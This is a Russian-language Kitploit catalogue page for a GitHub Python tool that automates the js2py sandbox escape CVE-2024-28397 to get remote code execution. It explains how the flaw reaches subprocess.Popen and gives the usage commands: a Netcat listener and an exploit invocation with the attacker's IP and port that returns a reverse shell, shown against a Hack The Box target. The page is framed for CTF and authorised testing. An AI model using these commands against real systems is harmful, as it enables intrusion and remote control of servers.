Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-28397-Exploit-Automation — Скрипт автоматизации на Python для эксплуатации уязвимости **js2py Sandbox Escape** (CVE-2024-28397). Этот инструмент автоматизирует процесс генерации и доставки полезной нагрузки для достижения удалённого выполнения кода (RCE) на уязвимых экземплярах. | Kitploit
Инструменты/GitHubGitHub/l1337xi/cve-2024-28397-exploit-automation
Генерация полезной нагрузкиЭксплуатацияЭксплуатация веб-приложенийCTFОбучение и ОбразованиеИнструмент Удаленного Доступа
GitHubl1337xi/cve-2024-28397-exploit-automation

CVE-2024-28397-Exploit-Automation

Скрипт автоматизации на Python для эксплуатации уязвимости **js2py Sandbox Escape** (CVE-2024-28397). Этот инструмент автоматизирует процесс генерации и доставки полезной нагрузки для достижения удалённого выполнения кода (RCE) на уязвимых экземплярах.

Репозиторий
229 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Автоматизация эксплуатации CVE-2024-28397

Python-скрипт для автоматизации эксплуатации уязвимости js2py Sandbox Escape (CVE-2024-28397). Этот инструмент автоматизирует процесс генерации и доставки полезной нагрузки для достижения удалённого выполнения кода (RCE) на уязвимых экземплярах.

⚠️ Правовое предупреждение Использование этого инструмента для атак на цели без предварительного обоюдного согласия незаконно. Этот репозиторий предназначен только для образовательных целей. Автор не несёт ответственности за любое неправомерное использование этой информации. Инструмент предназначен для использования в авторизованных оценках безопасности и средах Capture The Flag (CTF).

🧐 Об уязвимости

CVE-2024-28397 затрагивает библиотеку js2py (версии < 0.74). Библиотека не обеспечивает должную изоляцию среды JavaScript от среды хоста Python.

  • Недостаток: Некорректная санитизация входных данных позволяет получить доступ к внутренним атрибутам Python __class__ и __subclasses__.
  • Воздействие: Злоумышленник может пройти по иерархии объектов для доступа к subprocess.Popen, что позволяет выполнять произвольные команды на сервере.

🚀 Возможности

  • Автоматическая генерация полезной нагрузки: Автоматически формирует логику обхода песочницы JavaScript.
  • Кодирование Base64: Выполняет кодирование полезной нагрузки для предотвращения синтаксических ошибок при передаче.
  • Обработка соединений: Определяет успешное выполнение оболочки на основе тайм-аутов запросов.
  • Профессиональный вывод: Чистый CLI-интерфейс с обновлением статуса.

🛠️ Использование

Предварительные требования

root@kitploit:~
pip install requests

Запустите ваш Netcat-слушатель :

root@kitploit:~
nc -lvnp 1337

Запустите скрипт :

root@kitploit:~
python3 exploit.py -u <target url> -i <attacker ip> -p <attacker port>

📸 Доказательство концепции

Вот инструмент в действии против уязвимой цели (Hack The Box — CodeTwo):

1. Выполнение

Запуск эксплойта для генерации полезной нагрузки и вызова обратного подключения: crop3

2. Успех

Получение обратной оболочки (reverse shell) на слушателе: Успешная обратная оболочка

  • 📜 Авторы

  • Обнаружение уязвимости и основная JS-полезная нагрузка: Marven11

  • Скрипт автоматизации: L1337Xi

  • Соавторы:

    • Leyn4L
    • iamrizwanvp
    • axai457
Скачать инструмент